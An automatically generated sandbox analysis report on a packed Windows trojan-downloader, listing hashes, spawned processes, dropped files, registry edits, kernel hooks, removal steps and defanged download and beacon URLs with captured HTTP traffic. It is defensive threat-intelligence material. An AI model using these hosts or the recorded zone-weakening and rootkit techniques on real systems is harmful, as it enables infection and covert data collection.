HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.181159 (B) (Emsisoft), Gen:Variant.Graftor.181159 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8a082618de41b5f732173d81d516b4ef
SHA1: 6f1557cb1910831ccfcedc375fd4fa7966fb2a13
SHA256: 8fa28f799587fc2ff38a9c8880855e39f708e4a474246a29a676ccbef028c788
SSDeep: 12288:XU9OQl4SuMC1 It8ix/TlqlB zp19bg4YStrskcaVHHrE0JoS:XUrlRP0px/TlqlB l1xfYStrfca
Size: 484864 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-03-23 18:43:45
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540
The Trojan injects its code into the following process(es):
Cattle.exe:2188
%original file name%.exe:996
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process ndis500.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
The Trojan deletes the following file(s):
%System%\gYhxYl3.sys (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\vrPCEc2 (0 bytes)
The process appmon.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
The process ndsqp.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
The Trojan deletes the following file(s):
%System%\jBkaBo6.sys (0 bytes)
%System%\yuSFHf5 (0 bytes)
The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
The process audiodg.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
Registry activity
The process Cattle.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 58 62 76 4B 62 56 12 27 31 AD D2 B9 F4 41 DF"
The process ndis500.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 4B 82 8D 93 F2 BA 8D 01 58 74 8C 57 D2 E1 89"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\uOwZ216\Security]
[HKLM\System\CurrentControlSet\Services\uOwZ216]
[HKLM\System\CurrentControlSet\Services\uOwZ216\Enum]
The process appmon.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD 43 1E B1 C9 B1 0B B4 F3 A3 5C 4E C7 A1 57"
The process MiniIE.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 52 03 7F 5D B2 C6 4D 32 11 88 3B 68 99 67 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\KeS\MiniIE.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"
The process ndsqp.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA FA BE 37 55 0D 1D BB 16 77 C6 E2 93 24 30 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\xRzC549]
[HKLM\System\CurrentControlSet\Services\xRzC549\Enum]
[HKLM\System\CurrentControlSet\Services\xRzC549\Security]
The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D BF D3 46 03 3B 69 46 E3 3C 80 1C 9E 3E C3 F0"
The process audiodg.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F4 D8 59 52 8A 7F 9C 80 83 87 7B 2B D0 D7 B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"
The process yum.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 BE 5A 31 A2 A1 21 2D C5 A3 98 9E 1C D0 CE CF"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\KeS\sys32\"
Dropped PE files
MD5 | File path |
---|---|
8e1c47c30dba5d88699b2a1107be7e3d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\9JonVu.dll |
01e65067a6070e8f18609886e52bef38 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WaPZAC.exe |
000b3d8a037c797ed4482418c50f8a56 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\x6w8DF.dll |
2b383b8e15eefb852d4c926a205785fe | c:\Documents and Settings\"%CurrentUserName%"\Application Data\xwiR0J.dll |
287e0b871129d02e71b0d376bd8bef6c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\yOkNJW.dll |
f8eae7b3a0efaeac7e49d3bb61d34afd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\262792\svchost.exe |
cd0b75bc3eb6ca85cacce02aea253055 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\GWkgpu.nxx |
4116d723ede52ee003b2a7454334453d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\svchost.exe |
f6bb20d5d513f6e1e95557eb61de8324 | c:\WINDOWS\KeS\MiniIE.exe |
5db345ec4edd409b5cc18c6c56352360 | c:\WINDOWS\KeS\sys32\urlnav.dll |
6f089346e6a6a5fbbc9bfde8cab6c5d4 | c:\WINDOWS\KeS\yum.exe |
4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 335872 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 339968 | 483328 | 482816 | 5.54469 | ef47ba33313ada4919d252635d589320 |
UPX2 | 823296 | 4096 | 1024 | 1.77366 | 9b91b9a2651981ae286741309aeaab44 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.92zy.com/asb/apro.jpg | 42.121.28.225 |
hxxp://plus.zzinfor.cn/plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 | 116.255.243.151 |
hxxp://na.b9.aicdn.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | |
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA | 60.18.147.37 |
hxxp://na.b9.aicdn.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | |
hxxp://ln.p2ptool.com/txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | |
hxxp://ln.p2ptool.com/txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | |
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | |
hxxp://na.b9.aicdn.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | |
hxxp://na.b9.aicdn.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | |
hxxp://na.b9.aicdn.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | |
hxxp://na.b9.aicdn.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | |
hxxp://log.app.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | 115.238.251.56 |
hxxp://na.b9.aicdn.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | |
hxxp://prd-update.b0.upaiyun.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | 72.8.188.98 |
hxxp://app.log.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | |
hxxp://prd-update.b0.upaiyun.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | 72.8.188.98 |
u.raidmedia.com.cn | 180.150.178.245 |
l.raidmedia.com.cn | 120.132.48.228 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
